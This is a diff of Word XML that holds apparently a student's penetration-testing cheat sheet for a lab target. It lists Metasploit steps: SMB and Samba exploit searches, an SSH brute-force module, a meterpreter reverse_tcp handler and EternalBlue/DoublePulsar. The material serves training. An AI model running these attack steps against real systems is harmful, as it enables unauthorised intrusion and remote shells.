-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>usr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>/share/Metasploit-framework</w:t>
+              <w:t>Cd /usr/share/Metasploit-framework</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3404,7 +2620,6 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -3412,23 +2627,14 @@
               </w:rPr>
               <w:t>msfconsole</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – </w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">to </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t xml:space="preserve">trigger </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> in</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> shell</w:t>
+              <w:t xml:space="preserve">to trigger </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> in shell</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">  </w:t>
@@ -3496,15 +2702,7 @@
               <w:t>Use exploit/</w:t>
             </w:r>
             <w:r>
-              <w:t>windows/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/ms06_040.netapi</w:t>
+              <w:t>windows/smb/ms06_040.netapi</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3586,14 +2784,12 @@
             <w:r>
               <w:t xml:space="preserve">CL: show </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>paypload</w:t>
             </w:r>
             <w:r>
               <w:t>s</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -3684,52 +2880,362 @@
           </w:tcPr>
           <w:p>
             <w:r>
+              <w:t>CL: sudo nmap -sV {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchsploit {version}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+            <w:r>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ear</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ch {</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> version </w:t>
+            </w:r>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use exploit/unix/-&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: show payploads or show options</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: set target {number}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: exploit</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Netcat – allow connection to UDP and TCP</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>CL: nc -help</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Telnet</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: Searchsploit Linux tetnetd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: search Linux telnetd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: telnet {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>SMB</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchsploit samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchs samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>FIND THE VERSION</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/smb_version</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/{VERSION}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">CL: show </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>info</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> or show options</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> or show payloads</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: set RHOSTS {IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: run</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>GET VERSION</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>REPEAT</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchsploit Samba 3.0.20</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: user {PATHNAME}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>CL: show payloads</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: set payload {PAYLOAD-NAME} </w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>BRUTEFORCE</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>–</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> attack</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> SSH</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: search SSH</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/ssh/ssh_login</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: show info</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: set </w:t>
+            </w:r>
+            <w:r>
+              <w:t>PASS_FILE</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> {filepath}</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {version}</w:t>
+            <w:r>
+              <w:t>USER_FILE</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3737,636 +3243,93 @@
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
             <w:r>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ear</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">ch </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>{</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> version</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use exploit/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>unix</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/-&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: show </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>payploads</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> or show options</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: set target {number}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: exploit</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
+              <w:t>SET RHOST</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve"> CL: run</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>CL: s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>essions</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>sessions</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>FROM DESKTOP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: ssh msfadmin@{IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Use exploit/multi/handler</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>Netcat</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> – allow connection to UDP and TCP</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -help</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Telnet</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Linux </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>tetnetd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve">CL: search Linux </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>telnetd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>CL: telnet {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>SMB</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>searchs</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>FIND THE VERSION</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb_version</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/{VERSION}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">CL: show </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>info</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> or show options</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> or show payloads</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: set RHOSTS {IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: run</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>GET VERSION</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>REPEAT</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> Samba 3.0.20</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: user {PATHNAME}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>CL: show payloads</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: set payload {PAYLOAD-NAME} </w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>BRUTEFORCE</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>–</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> attack</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> SSH</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: search SSH</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ssh</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ssh_login</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: show info</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: set </w:t>
-            </w:r>
-            <w:r>
-              <w:t>PASS_FILE</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>filepath</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:r>
-              <w:t>USER_FILE</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:r>
-              <w:t>SET RHOST</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve"> CL: run</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>CL: s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>essions</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>sessions</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 1</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>FROM DESKTOP</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ssh</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfadmin</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>@{IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>Use exploit/multi/handler</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>CL: set payload windows/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>meterpreter</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>reverse_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>CL: set payload windows/meterpreter/reverse_tcp</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -4439,13 +3402,8 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">CL: search </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>eternalblue</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>CL: search eternalblue</w:t>
+            </w:r>
           </w:p>
           <w:p/>
         </w:tc>
@@ -4466,14 +3424,12 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>DoublePulsar</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
@@ -4494,36 +3450,13 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>su</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
